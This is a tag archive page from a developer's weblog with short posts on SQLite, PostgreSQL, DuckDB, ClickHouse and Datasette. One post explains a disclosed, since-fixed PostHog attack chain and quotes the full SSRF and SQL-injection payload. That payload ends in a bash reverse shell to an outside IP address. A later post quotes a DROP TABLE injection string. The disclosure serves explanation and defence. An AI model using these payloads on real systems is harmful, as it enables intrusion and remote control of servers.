Simon Willison's Weblog: sql

SQLite 3.53.0

2026-04-11T19:56:53+00:00

SQLite 3.52.0 was withdrawn so this is a pretty big release with a whole lot of accumulated user-facing and internal improvements. Some that stood out to me:

ALTER TABLE can now add and remove NOT NULL and CHECK constraints - I've previously used my own sqlite-utils transform() method for this.
New json_array_insert() function and its jsonb equivalent.
Significant improvements to CLI mode, including result formatting.

The result formatting improvements come from a new library, the Query Results Formatter. I had Claude Code (on my phone) compile that to WebAssembly and build this playground interface for trying that out.

Via Lobste.rs

Tags: sql, sqlite

Syntaqlite Playground

2026-04-05T19:32:59+00:00

Tool: Syntaqlite Playground

Lalit Maganti's syntaqlite is currently being discussed on Hacker News thanks to Eight years of wanting, three months of building with AI, a deep dive into how it was built.

This inspired me to revisit a research project I ran when Lalit first released it a couple of weeks ago, where I tried it out and then compiled it to a WebAssembly wheel so it could run in Pyodide in a browser (the library itself uses C and Rust).

This new playground loads up the Python library and provides a UI for trying out its different features: formating, parsing into an AST, validating, and tokenizing SQLite SQL queries.

Update: not sure how I missed this but syntaqlite has its own WebAssembly playground linked to from the README.

Tags: sql, sqlite, tools, ai-assisted-programming, agentic-engineering

Production query plans without production data

2026-03-09T15:05:15+00:00

Production query plans without production data

Radim Marek describes the new pg_restore_relation_stats() and pg_restore_attribute_stats() functions that were introduced in PostgreSQL 18 in September 2025.

The PostgreSQL query planner makes use of internal statistics to help it decide how to best execute a query. These statistics often differ between production data and development environments, which means the query plans used in production may not be replicable in development.

PostgreSQL's new features now let you copy those statistics down to your development environment, allowing you to simulate the plans for production workloads without needing to copy in all of that data first.

I found this illustrative example useful:

SELECT pg_restore_attribute_stats(
    'schemaname', 'public',
    'relname', 'test_orders',
    'attname', 'status',
    'inherited', false::boolean,
    'null_frac', 0.0::real,
    'avg_width', 9::integer,
    'n_distinct', 5::real,
    'most_common_vals', '{delivered,shipped,cancelled,pending,returned}'::text,
    'most_common_freqs', '{0.95,0.015,0.015,0.015,0.005}'::real[]
);

This simulates statistics for a status column that is 95% delivered. Based on these statistics PostgreSQL can decide to use an index for status = 'shipped' but to instead perform a full table scan for status = 'delivered'.

These statistics are pretty small. Radim says:

Statistics dumps are tiny. A database with hundreds of tables and thousands of columns produces a statistics dump under 1MB. The production data might be hundreds of GB. The statistics that describe it fit in a text file.

I posted on the SQLite user forum asking if SQLite could offer a similar feature and D. Richard Hipp promptly replied that it has one already:

All of the data statistics used by the query planner in SQLite are available in the sqlite_stat1 table (or also in the sqlite_stat4 table if you happen to have compiled with SQLITE_ENABLE_STAT4). That table is writable. You can inject whatever alternative statistics you like.

This approach to controlling the query planner is mentioned in the documentation: https://sqlite.org/optoverview.html#manual_control_of_query_plans_using_sqlite_stat_tables.

See also https://sqlite.org/lang_analyze.html#fixed_results_of_analyze.

The ".fullschema" command in the CLI outputs both the schema and the content of the sqlite_statN tables, exactly for the reasons outlined above - so that we can reproduce query problems for testing without have to load multi-terabyte database files.

Via Lobste.rs

Tags: databases, postgresql, sql, sqlite, d-richard-hipp

The most popular blogs of Hacker News in 2025

2026-01-02T19:10:43+00:00

Michael Lynch maintains HN Popularity Contest, a site that tracks personal blogs on Hacker News and scores them based on how well they perform on that platform.

The engine behind the project is the domain-meta.csv CSV on GiHub, a hand-curated list of known personal blogs with author and bio and tag metadata, which Michael uses to separate out personal blog posts from other types of content.

I came top of the rankings in 2023, 2024 and 2025 but I'm listed in third place for all time behind Paul Graham and Brian Krebs.

I dug around in the browser inspector and was delighted to find that the data powering the site is served with open CORS headers, which means you can easily explore it with external services like Datasette Lite.

Here's a convoluted window function query Claude Opus 4.5 wrote for me which, for a given domain, shows where that domain ranked for each year since it first appeared in the dataset:

with yearly_scores as (
  select 
    domain,
    strftime('%Y', date) as year,
    sum(score) as total_score,
    count(distinct date) as days_mentioned
  from "hn-data"
  group by domain, strftime('%Y', date)
),
ranked as (
  select 
    domain,
    year,
    total_score,
    days_mentioned,
    rank() over (partition by year order by total_score desc) as rank
  from yearly_scores
)
select 
  r.year,
  r.total_score,
  r.rank,
  r.days_mentioned
from ranked r
where r.domain = :domain
  and r.year >= (
    select min(strftime('%Y', date)) 
    from "hn-data"
    where domain = :domain
  )
order by r.year desc

(I just noticed that the last and r.year >= ( clause isn't actually needed here.)

My simonwillison.net results show me ranked 3rd in 2022, 30th in 2021 and 85th back in 2007 - though I expect there are many personal blogs from that year which haven't yet been manually added to Michael's list.

Also useful is that every domain gets its own CORS-enabled CSV file with details of the actual Hacker News submitted from that domain, e.g. https://hn-popularity.cdn.refactoringenglish.com/domains/simonwillison.net.csv. Here's that one in Datasette Lite.

Via Hacker News

Tags: hacker-news, sql, sqlite, datasette, datasette-lite, cors

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain

2025-12-18T01:42:22+00:00

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain

Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.

The way in abuses a webhooks system with non-robust URL validation, setting up a SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.

Here's the URL that gets injected:

http://clickhouse:8123/?query=SELECT++FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+>%26+/dev/tcp/172.31.221.180/4444+0>%261\\"$$;SELECT++FROM+cmd_exec;+--\",'posthog','posthog')#

Reformatted a little for readability:

http://clickhouse:8123/?query=
SELECT *
FROM postgresql(
    'db:5432',
    'posthog',
    "posthog_use')) TO STDOUT;
    END;
    DROP TABLE IF EXISTS cmd_exec;
    CREATE TABLE cmd_exec (
        cmd_output text
    );
    COPY cmd_exec
    FROM PROGRAM $$
        bash -c \"bash -i >& /dev/tcp/172.31.221.180/4444 0>&1\"
    $$;
    SELECT * FROM cmd_exec;
    --",
    'posthog',
    'posthog'
)
#

This abuses ClickHouse's ability to run its own queries against PostgreSQL using the postgresql() table function, combined with an escaping bug in ClickHouse PostgreSQL function (since fixed). Then that query abuses PostgreSQL's ability to run shell commands via COPY ... FROM PROGRAM.

The bash -c bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.

Via Hacker News

Tags: postgresql, security, sql, sql-injection, webhooks, clickhouse

How I automate my Substack newsletter with content from my blog

2025-11-19T22:00:34+00:00

I sent out my weekly-ish Substack newsletter this morning and took the opportunity to record a YouTube video demonstrating my process and describing the different components that make it work. There's a lot of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack.

The core process is the same as I described back in 2023. I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button.

I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes.

I make very minor edits:

I set the title and the subheading for the newsletter. This is often a direct copy of the title of the featured blog post.
Substack turns YouTube URLs into embeds, which often isn't what I want - especially if I have a YouTube URL inside a code example.
Blocks of preformatted text often have an extra blank line at the end, which I remove.
Occasionally I'll make a content edit - removing a piece of content that doesn't fit the newsletter, or fixing a time reference like "yesterday" that doesn't make sense any more.
I pick the featured image for the newsletter and add some tags.

That's the whole process!

The Observable notebook

The most important cell in the Observable notebook is this one:

raw_content = {
  return await (
    await fetch(
      `https://datasette.simonwillison.net/simonwillisonblog.json?sql=${encodeURIComponent(
        sql
      )}&_shape=array&numdays=${numDays}`
    )
  ).json();
}

This uses the JavaScript fetch() function to pull data from my blog's Datasette instance, using a very complex SQL query that is composed elsewhere in the notebook.

Here's a link to see and execute that query directly in Datasette. It's 143 lines of convoluted SQL that assembles most of the HTML for the newsletter using SQLite string concatenation! An illustrative snippet:

with content as (
  select
    id,
    'entry' as type,
    title,
    created,
    slug,
    '<h3><a href="' || 'https://simonwillison.net/' || strftime('%Y/', created)
      || substr('JanFebMarAprMayJunJulAugSepOctNovDec', (strftime('%m', created) - 1) * 3 + 1, 3) 
      || '/' || cast(strftime('%d', created) as integer) || '/' || slug || '/' || '">' 
      || title || '</a> - ' || date(created) || '</h3>' || body
      as html,
    'null' as json,
    '' as external_url
  from blog_entry
  union all
  # ...

My blog's URLs look like /2025/Nov/18/gemini-3/ - this SQL constructs that three letter month abbreviation from the month number using a substring operation.

This is a terrible way to assemble HTML, but I've stuck with it because it amuses me.

The rest of the Observable notebook takes that data, filters out anything that links to content mentioned in the previous newsletters and composes it into a block of HTML that can be copied using that big button.

Here's the recipe it uses to turn HTML into rich text content on a clipboard suitable for Substack. I can't remember how I figured this out but it's very effective:

Object.assign(
  html`<button style="font-size: 1.4em; padding: 0.3em 1em; font-weight: bold;">Copy rich text newsletter to clipboard`,
  {
    onclick: () => {
      const htmlContent = newsletterHTML;
      // Create a temporary element to hold the HTML content
      const tempElement = document.createElement("div");
      tempElement.innerHTML = htmlContent;
      document.body.appendChild(tempElement);
      // Select the HTML content
      const range = document.createRange();
      range.selectNode(tempElement);
      // Copy the selected HTML content to the clipboard
      const selection = window.getSelection();
      selection.removeAllRanges();
      selection.addRange(range);
      document.execCommand("copy");
      selection.removeAllRanges();
      document.body.removeChild(tempElement);
    }
  }
)

From Django+Postgresql to Datasette+SQLite

My blog itself is a Django application hosted on Heroku, with data stored in Heroku PostgreSQL. Here's the source code for that Django application. I use the Django admin as my CMS.

Datasette provides a JSON API over a SQLite database... which means something needs to convert that PostgreSQL database into a SQLite database that Datasette can use.

My system for doing that lives in the simonw/simonwillisonblog-backup GitHub repository. It uses GitHub Actions on a schedule that executes every two hours, fetching the latest data from PostgreSQL and converting that to SQLite.

My db-to-sqlite tool is responsible for that conversion. I call it like this:

db-to-sqlite \
  $(heroku config:get DATABASE_URL -a simonwillisonblog | sed s/postgres:/postgresql+psycopg2:/) \
  simonwillisonblog.db \
  --table auth_permission \
  --table auth_user \
  --table blog_blogmark \
  --table blog_blogmark_tags \
  --table blog_entry \
  --table blog_entry_tags \
  --table blog_quotation \
  --table blog_quotation_tags \
  --table blog_note \
  --table blog_note_tags \
  --table blog_tag \
  --table blog_previoustagname \
  --table blog_series \
  --table django_content_type \
  --table redirects_redirect

That heroku config:get DATABASE_URL command uses Heroku credentials in an environment variable to fetch the database connection URL for my blog's PostgreSQL database (and fixes a small difference in the URL scheme).

db-to-sqlite can then export that data and write it to a SQLite database file called simonwillisonblog.db.

The --table options specify the tables that should be included in the export.

The repository does more than just that conversion: it also exports the resulting data to JSON files that live in the repository, which gives me a commit history of changes I make to my content. This is a cheap way to get a revision history of my blog content without having to mess around with detailed history tracking inside the Django application itself.

At the end of my GitHub Actions workflow is this code that publishes the resulting database to Datasette running on Fly.io using the datasette publish fly plugin:

datasette publish fly simonwillisonblog.db \
  -m metadata.yml \
  --app simonwillisonblog-backup \
  --branch 1.0a2 \
  --extra-options "--setting sql_time_limit_ms 15000 --setting truncate_cells_html 10000 --setting allow_facet off" \
  --install datasette-block-robots \
  # ... more plugins

As you can see, there are a lot of moving parts! Surprisingly it all mostly just works - I rarely have to intervene in the process, and the cost of those different components is pleasantly low.

Tags: blogging, django, javascript, postgresql, sql, sqlite, youtube, heroku, datasette, observable, github-actions, fly, newsletter, substack, site-upgrades

A new SQL-powered permissions system in Datasette 1.0a20

2025-11-04T21:34:42+00:00

Datasette 1.0a20 is out with the biggest breaking API change on the road to 1.0, improving how Datasette's permissions system works by migrating permission logic to SQL running in SQLite. This release involved 163 commits, with 10,660 additions and 1,825 deletions, most of which was written with the help of Claude Code.

Understanding the permissions system

Datasette's permissions system exists to answer the following question:

Is this actor allowed to perform this action, optionally against this particular resource?

An actor is usually a user, but might also be an automation operating via the Datasette API.

An action is a thing they need to do - things like view-table, execute-sql, insert-row.

A resource is the subject of the action - the database you are executing SQL against, the table you want to insert a row into.

Datasette's default configuration is public but read-only: anyone can view databases and tables or execute read-only SQL queries but no-one can modify data.

Datasette plugins can enable all sorts of additional ways to interact with databases, many of which need to be protected by a form of authentication Datasette also 1.0 includes a write API with a need to configure who can insert, update, and delete rows or create new tables.

Actors can be authenticated in a number of different ways provided by plugins using the actor_from_request() plugin hook. datasette-auth-passwords and datasette-auth-github and datasette-auth-existing-cookies are examples of authentication plugins.

Permissions systems need to be able to efficiently list things

The previous implementation included a design flaw common to permissions systems of this nature: each permission check involved a function call which would delegate to one or more plugins and return a True/False result.

This works well for single checks, but has a significant problem: what if you need to show the user a list of things they can access, for example the tables they can view?

I want Datasette to be able to handle potentially thousands of tables - tables in SQLite are cheap! I don't want to have to run 1,000+ permission checks just to show the user a list of tables.

Since Datasette is built on top of SQLite we already have a powerful mechanism to help solve this problem. SQLite is really good at filtering large numbers of records.

The new permission_resources_sql() plugin hook

The biggest change in the new release is that I've replaced the previous permission_allowed(actor, action, resource) plugin hook - which let a plugin determine if an actor could perform an action against a resource - with a new permission_resources_sql(actor, action) plugin hook.

Instead of returning a True/False result, this new hook returns a SQL query that returns rules helping determine the resources the current actor can execute the specified action against.

Here's an example, lifted from the documentation:

from datasette import hookimpl
from datasette.permissions import PermissionSQL


@hookimpl
def permission_resources_sql(datasette, actor, action):
    if action != "view-table":
        return None
    if not actor or actor.get("id") != "alice":
        return None

    return PermissionSQL(
        sql="""
            SELECT
                'accounting' AS parent,
                'sales' AS child,
                1 AS allow,
                'alice can view accounting/sales' AS reason
        """,
    )

This hook grants the actor with ID "alice" permission to view the "sales" table in the "accounting" database.

The PermissionSQL object should always return four columns: a parent, child, allow (1 or 0), and a reason string for debugging.

When you ask Datasette to list the resources an actor can access for a specific action, it will combine the SQL returned by all installed plugins into a single query that joins against the internal catalog tables and efficiently lists all the resources the actor can access.

This query can then be limited or paginated to avoid loading too many results at once.

Hierarchies, plugins, vetoes, and restrictions

Datasette has several additional requirements that make the permissions system more complicated.

Datasette permissions can optionally act against a two-level hierarchy. You can grant a user the ability to insert-row against a specific table, or every table in a specific database, or every table in every database in that Datasette instance.

Some actions can apply at the table level, others the database level and others only make sense globally - enabling a new feature that isn't tied to tables or databases, for example.

Datasette currently has ten default actions but plugins that add additional features can register new actions to better participate in the permission systems.

Datasette's permission system has a mechanism to veto permission checks - a plugin can return a deny for a specific permission check which will override any allows. This needs to be hierarchy-aware - a deny at the database level can be outvoted by an allow at the table level.

Finally, Datasette includes a mechanism for applying additional restrictions to a request. This was introduced for Datasette's API - it allows a user to create an API token that can act on their behalf but is only allowed to perform a subset of their capabilities - just reading from two specific tables, for example. Restrictions are described in more detail in the documentation.

That's a lot of different moving parts for the new implementation to cover.

New debugging tools

Since permissions are critical to the security of a Datasette deployment it's vital that they are as easy to understand and debug as possible.

The new alpha adds several new debugging tools, including this page that shows the full list of resources matching a specific action for the current user:

And this page listing the rules that apply to that question - since different plugins may return different rules which get combined together:

This screenshot illustrates two of Datasette's built-in rules: there is a default allow for read-only operations such as view-table (which can be over-ridden by plugins) and another rule that says the root user can do anything (provided Datasette was started with the --root option.)

Those rules are defined in the datasette/default_permissions.py Python module.

The missing feature: list actors who can act on this resource

There's one question that the new system cannot answer: provide a full list of actors who can perform this action against this resource.

It's not possibly to provide this globally for Datasette because Datasette doesn't have a way to track what "actors" exist in the system. SSO plugins such as datasette-auth-github mean a new authenticated GitHub user might show up at any time, with the ability to perform actions despite the Datasette system never having encountered that particular username before.

API tokens and actor restrictions come into play here as well. A user might create a signed API token that can perform a subset of actions on their behalf - the existence of that token can't be predicted by the permissions system.

This is a notable omission, but it's also quite common in other systems. AWS cannot provide a list of all actors who have permission to access a specific S3 bucket, for example - presumably for similar reasons.

Upgrading plugins for Datasette 1.0a20

Datasette's plugin ecosystem is the reason I'm paying so much attention to ensuring Datasette 1.0 has a stable API. I don't want plugin authors to need to chase breaking changes once that 1.0 release is out.

The Datasette upgrade guide includes detailed notes on upgrades that are needed between the 0.x and 1.0 alpha releases. I've added an extensive section about the permissions changes to that document.

I've also been experimenting with dumping those instructions directly into coding agent tools - Claude Code and Codex CLI - to have them upgrade existing plugins for me. This has been working extremely well. I've even had Claude Code update those notes itself with things it learned during an upgrade process!

This is greatly helped by the fact that every single Datasette plugin has an automated test suite that demonstrates the core functionality works as expected. Coding agents can use those tests to verify that their changes have had the desired effect.

I've also been leaning heavily on uv to help with the upgrade process. I wrote myself two new helper scripts - tadd and radd - to help test the new plugins.

tadd = "test against datasette dev" - it runs a plugin's existing test suite against the current development version of Datasette checked out on my machine. It passes extra options through to pytest so I can run tadd -k test_name or tadd -x --pdb as needed.
radd = "run against datasette dev" - it runs the latest dev datasette command with the plugin installed.

The tadd and radd implementations can be found in this TIL.

Some of my plugin upgrades have become a one-liner to the codex exec command, which runs OpenAI Codex CLI with a prompt without entering interactive mode:

codex exec --dangerously-bypass-approvals-and-sandbox \
"Run the command tadd and look at the errors and then
read ~/dev/datasette/docs/upgrade-1.0a20.md and apply
fixes and run the tests again and get them to pass"

There are still a bunch more to go - there's a list in this tracking issue - but I expect to have the plugins I maintain all upgraded pretty quickly now that I have a solid process in place.

Using Claude Code to implement this change

This change to Datasette core by far the most ambitious piece of work I've ever attempted using a coding agent.

Last year I agreed with the prevailing opinion that LLM assistance was much more useful for greenfield coding tasks than working on existing codebases. The amount you could usefully get done was greatly limited by the need to fit the entire codebase into the model's context window.

Coding agents have entirely changed that calculation. Claude Code and Codex CLI still have relatively limited token windows - albeit larger than last year - but their ability to search through the codebase, read extra files on demand and "reason" about the code they are working with has made them vastly more capable.

I no longer see codebase size as a limiting factor for how useful they can be.

I've also spent enough time with Claude Sonnet 4.5 to build a weird level of trust in it. I can usually predict exactly what changes it will make for a prompt. If I tell it "extract this code into a separate function" or "update every instance of this pattern" I know it's likely to get it right.

For something like permission code I still review everything it does, often by watching it as it works since it displays diffs in the UI.

I also pay extremely close attention to the tests it's writing. Datasette 1.0a19 already had 1,439 tests, many of which exercised the existing permission system. 1.0a20 increases that to 1,583 tests. I feel very good about that, especially since most of the existing tests continued to pass without modification.

Starting with a proof-of-concept

I built several different proof-of-concept implementations of SQL permissions before settling on the final design. My research/sqlite-permissions-poc project was the one that finally convinced me of a viable approach,

That one started as a free ranging conversation with Claude, at the end of which I told it to generate a specification which I then fed into GPT-5 to implement. You can see that specification at the end of the README.

I later fed the POC itself into Claude Code and had it implement the first version of the new Datasette system based on that previous experiment.

This is admittedly a very weird way of working, but it helped me finally break through on a problem that I'd been struggling with for months.

Miscellaneous tips I picked up along the way

When working on anything relating to plugins it's vital to have at least a few real plugins that you upgrade in lock-step with the core changes. The tadd and radd shortcuts were invaluable for productively working on those plugins while I made changes to core.
Coding agents make experiments much cheaper. I threw away so much code on the way to the final implementation, which was psychologically easier because the cost to create that code in the first place was so low.
Tests, tests, tests. This project would have been impossible without that existing test suite. The additional tests we built along the way give me confidence that the new system is as robust as I need it to be.
Claude writes good commit messages now! I finally gave in and let it write these - previously I've been determined to write them myself. It's a big time saver to be able to say "write a tasteful commit message for these changes".
Claude is also great at breaking up changes into smaller commits. It can also productively rewrite history to make it easier to follow, especially useful if you're still working in a branch.
A really great way to review Claude's changes is with the GitHub PR interface. You can attach comments to individual lines of code and then later prompt Claude like this: Use gh CLI to fetch comments on URL-to-PR and make the requested changes. This is a very quick way to apply little nitpick changes - rename this function, refactor this repeated code, add types here etc.
The code I write with LLMs is higher quality code. I usually find myself making constant trade-offs while coding: this function would be neater if I extracted this helper, it would be nice to have inline documentation here, this changing this would be good but would break a dozen tests... for each of those I have to determine if the additional time is worth the benefit. Claude can apply changes so much faster than me that these calculations have changed - almost any improvement is worth applying, no matter how trivial, because the time cost is so low.
Internal tools are cheap now. The new debugging interfaces were mostly written by Claude and are significantly nicer to use and look at than the hacky versions I would have knocked out myself, if I had even taken the extra time to build them.
That trick with a Markdown file full of upgrade instructions works astonishingly well - it's the same basic idea as Claude Skills. I maintain over 100 Datasette plugins now and I expect I'll be automating all sorts of minor upgrades in the future using this technique.

What's next?

Now that the new alpha is out my focus is upgrading the existing plugin ecosystem to use it, and supporting other plugin authors who are doing the same.

The new permissions system unlocks some key improvements to Datasette Cloud concerning finely-grained permissions for larger teams, so I'll be integrating the new alpha there this week.

This is the single biggest backwards-incompatible change required before Datasette 1.0. I plan to apply the lessons I learned from this project to the other, less intimidating changes. I'm hoping this can result in a final 1.0 release before the end of the year!

Tags: plugins, projects, python, sql, sqlite, datasette, annotated-release-notes, uv, coding-agents, claude-code, codex-cli

Quoting IanCal

2025-09-06T06:41:49+00:00

RDF has the same problems as the SQL schemas with information scattered. What fields mean requires documentation.

There - they have a name on a person. What name? Given? Legal? Chosen? Preferred for this use case?

You only have one ID for Apple eh? Companies are complex to model, do you mean Apple just as someone would talk about it? The legal structure of entities that underpins all major companies, what part of it is referred to?

I spent a long time building identifiers for universities and companies (which was taken for ROR later) and it was a nightmare to say what a university even was. What’s the name of Cambridge? It’s not “Cambridge University” or “The university of Cambridge” legally. But it also is the actual name as people use it. [It's The Chancellor, Masters, and Scholars of the University of Cambridge]

The university of Paris went from something like 13 institutes to maybe one to then a bunch more. Are companies locations at their headquarters? Which headquarters?

Someone will suggest modelling to solve this but here lies the biggest problem:

The correct modelling depends on the questions you want to answer.

— IanCal, on Hacker News, discussing RDF

Tags: metadata, sql, hacker-news, rdf

Spatial Joins in DuckDB

2025-08-23T21:21:02+00:00

Spatial Joins in DuckDB

Extremely detailed overview by Max Gabrielsson of DuckDB's new spatial join optimizations.

Consider the following query, which counts the number of NYC Citi Bike Trips for each of the neighborhoods defined by the NYC Neighborhood Tabulation Areas polygons and returns the top three:

SELECT neighborhood,
  count(*) AS num_rides
FROM rides
JOIN hoods ON ST_Intersects(
  rides.start_geom, hoods.geom
)
GROUP BY neighborhood
ORDER BY num_rides DESC
LIMIT 3;

The rides table contains 58,033,724 rows. The hoods table has polygons for 310 neighborhoods.

Without an optimized spatial joins this query requires a nested loop join, executing that expensive ST_Intersects() operation 58m * 310 ~= 18 billion times. This took around 30 minutes on the 36GB MacBook M3 Pro used for the benchmark.

The first optimization described - implemented from DuckDB 1.2.0 onwards - uses a "piecewise merge join". This takes advantage of the fact that a bounding box intersection is a whole lot faster to calculate, especially if you pre-cache the bounding box (aka the minimum bounding rectangle or MBR) in the stored binary GEOMETRY representation.

Rewriting the query to use a fast bounding box intersection and then only running the more expensive ST_Intersects() filters on those matches drops the runtime from 1800 seconds to 107 seconds.

The second optimization, added in DuckDB 1.3.0 in May 2025 using the new SPATIAL_JOIN operator, is significantly more sophisticated.

DuckDB can now identify when a spatial join is working against large volumes of data and automatically build an in-memory R-Tree of bounding boxes for the larger of the two tables being joined.

This new R-Tree further accelerates the bounding box intersection part of the join, and drops the runtime down to just 30 seconds.

Via @mackaszechno.bsky.social

Tags: geospatial, sql, duckdb

TIL: SQLite triggers

2025-05-10T05:20:45+00:00

TIL: SQLite triggers

I've been doing some work with SQLite triggers recently while working on sqlite-chronicle, and I decided I needed a single reference to exactly which triggers are executed for which SQLite actions and what data is available within those triggers.

I wrote this triggers.py script to output as much information about triggers as possible, then wired it into a TIL article using Cog. The Cog-powered source code for the TIL article can be seen here.

Tags: python, sql, sqlite, til

SQLite CREATE TABLE: The DEFAULT clause

2025-05-08T22:37:44+00:00

SQLite CREATE TABLE: The DEFAULT clause

If your SQLite create table statement includes a line like this:

CREATE TABLE alerts (
    -- ...
    alert_created_at text default current_timestamp
)

current_timestamp will be replaced with a UTC timestamp in the format 2025-05-08 22:19:33. You can also use current_time for HH:MM:SS and current_date for YYYY-MM-DD, again using UTC.

Posting this here because I hadn't previously noticed that this defaults to UTC, which is a useful detail. It's also a strong vote in favor of YYYY-MM-DD HH:MM:SS as a string format for use with SQLite, which doesn't otherwise provide a formal datetime type.

Tags: datetime, sql, sqlite

DuckDB is Probably the Most Important Geospatial Software of the Last Decade

2025-05-04T00:28:35+00:00

DuckDB is Probably the Most Important Geospatial Software of the Last Decade

Drew Breunig argues that the ease of installation of DuckDB is opening up geospatial analysis to a whole new set of developers.

This inspired a comment on Hacker News from DuckDB Labs geospatial engineer Max Gabrielsson which helps explain why the drop in friction introduced by DuckDB is so significant:

I think a big part is that duckdbs spatial extension provides a SQL interface to a whole suite of standard foss gis packages by statically bundling everything (including inlining the default PROJ database of coordinate projection systems into the binary) and providing it for multiple platforms (including WASM). I.E there are no transitive dependencies except libc.

[...] the fact that you can e.g. convert too and from a myriad of different geospatial formats by utilizing GDAL, transforming through SQL, or pulling down the latest overture dump without having the whole workflow break just cause you updated QGIS has probably been the main killer feature for a lot of the early adopters.

I've lost count of the time I've spent fiddling with dependencies like GDAL trying to get various geospatial tools to work in the past. Bundling difficult dependencies statically is an under-appreciated trick!

If the bold claim in the headline inspires you to provide a counter-example, bear in mind that a decade ago is 2015, and most of the key technologies In the modern geospatial stack - QGIS, PostGIS, geopandas, SpatiaLite - predate that by quite a bit.

Tags: geospatial, sql, duckdb, drew-breunig

New dashboard: alt text for all my images

2025-04-28T01:22:27+00:00

New dashboard: alt text for all my images

I got curious today about how I'd been using alt text for images on my blog, and realized that since I have Django SQL Dashboard running on this site and PostgreSQL is capable of parsing HTML with regular expressions I could probably find out using a SQL query.

I pasted my PostgreSQL schema into Claude and gave it a pretty long prompt:

Give this PostgreSQL schema I want a query that returns all of my images and their alt text. Images are sometimes stored as HTML image tags and other times stored in markdown.

blog_quotation.quotation, blog_note.body both contain markdown. blog_blogmark.commentary has markdown if use_markdown is true or HTML otherwise. blog_entry.body is always HTML

Write me a SQL query to extract all of my images and their alt tags using regular expressions. In HTML documents it should look for either <img .* src="..." .* alt="..." or <img alt="..." .* src="..." (images may be self-closing XHTML style in some places). In Markdown they will always be ![alt text](url)

I want the resulting table to have three columns: URL, alt_text, src - the URL column needs to be constructed as e.g. /2025/Feb/2/slug for a record where created is on 2nd feb 2025 and the slug column contains slug

Use CTEs and unions where appropriate

It almost got it right on the first go, and with a couple of follow-up prompts I had the query I wanted. I also added the option to search my alt text / image URLs, which has already helped me hunt down and fix a few old images on expired domain names. Here's a copy of the finished 100 line SQL query.

Tags: accessibility, alt-text, postgresql, sql, ai, django-sql-dashboard, generative-ai, llms, ai-assisted-programming, claude

ClickHouse gets lazier (and faster): Introducing lazy materialization

2025-04-22T17:05:33+00:00

ClickHouse gets lazier (and faster): Introducing lazy materialization

Tom Schreiber describe's the latest optimization in ClickHouse, and in the process explores a whole bunch of interesting characteristics of columnar datastores generally.

As I understand it, the new "lazy materialization" feature means that if you run a query like this:

select id, big_col1, big_col2
from big_table order by rand() limit 5

Those big_col1 and big_col2 columns won't be read from disk for every record, just for the five that are returned. This can dramatically improve the performance of queries against huge tables - for one example query ClickHouse report a drop from "219 seconds to just 139 milliseconds—with 40× less data read and 300× lower memory usage."

I'm linking to this mainly because the article itself is such a detailed discussion of columnar data patterns in general. It caused me to update my intuition for how queries against large tables can work on modern hardware. This query for example:

SELECT helpful_votes
FROM amazon.amazon_reviews
ORDER BY helpful_votes DESC
LIMIT 3;

Can run in 70ms against a 150 million row, 70GB table - because in a columnar database you only need to read that helpful_votes integer column which adds up to just 600MB of data, and sorting 150 million integers on a decent machine takes no time at all.

Via Hacker News

Tags: databases, sql, clickhouse

Abusing DuckDB-WASM by making SQL draw 3D graphics (Sort Of)

2025-04-22T16:29:13+00:00

Abusing DuckDB-WASM by making SQL draw 3D graphics (Sort Of)

Brilliant hack by Patrick Trainer who got an ASCII-art Doom clone running in the browser using convoluted SQL queries running against the WebAssembly build of DuckDB. Here’s the live demo, and the code on GitHub.

The SQL is so much fun. Here’s a snippet that implements ray tracing as part of a SQL view:

CREATE OR REPLACE VIEW render_3d_frame AS
WITH RECURSIVE
    -- ...
    rays AS (
        SELECT 
            c.col, 
            (p.dir - s.fov/2.0 + s.fov * (c.col*1.0 / (s.view_w - 1))) AS angle 
        FROM cols c, s, p
    ),
    raytrace(col, step_count, fx, fy, angle) AS (
        SELECT 
            r.col, 
            1, 
            p.x + COS(r.angle)*s.step, 
            p.y + SIN(r.angle)*s.step, 
            r.angle 
        FROM rays r, p, s 
        UNION ALL 
        SELECT 
            rt.col, 
            rt.step_count + 1, 
            rt.fx + COS(rt.angle)*s.step, 
            rt.fy + SIN(rt.angle)*s.step, 
            rt.angle 
        FROM raytrace rt, s 
        WHERE rt.step_count < s.max_steps 
          AND NOT EXISTS (
              SELECT 1 
              FROM map m 
              WHERE m.x = CAST(rt.fx AS INT) 
                AND m.y = CAST(rt.fy AS INT) 
                AND m.tile = '#'
          )
    ),
    -- ...

Via Hacker News

Tags: sql, webassembly, duckdb

[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]

2025-04-09T16:52:04+00:00

[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]

I just noticed that the legendary company name ; DROP TABLE "COMPANIES";-- LTD is now listed as [NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE] on the UK government Companies House website.

For background, see No, I didn't try to break Companies House by culprit Sam Pizzey.

Tags: sql, sql-injection

I Went To SQL Injection Court

2025-02-25T22:45:57+00:00

I Went To SQL Injection Court

Thomas Ptacek talks about his ongoing involvement as an expert witness in an Illinois legal battle lead by Matt Chapman over whether a SQL schema (e.g. for the CANVAS parking ticket database) should be accessible to Freedom of Information (FOIA) requests against the Illinois state government.

They eventually lost in the Illinois Supreme Court, but there's still hope in the shape of IL SB0226, a proposed bill that would amend the FOIA act to ensure "that the public body shall provide a sufficient description of the structures of all databases under the control of the public body to allow a requester to request the public body to perform specific database queries".

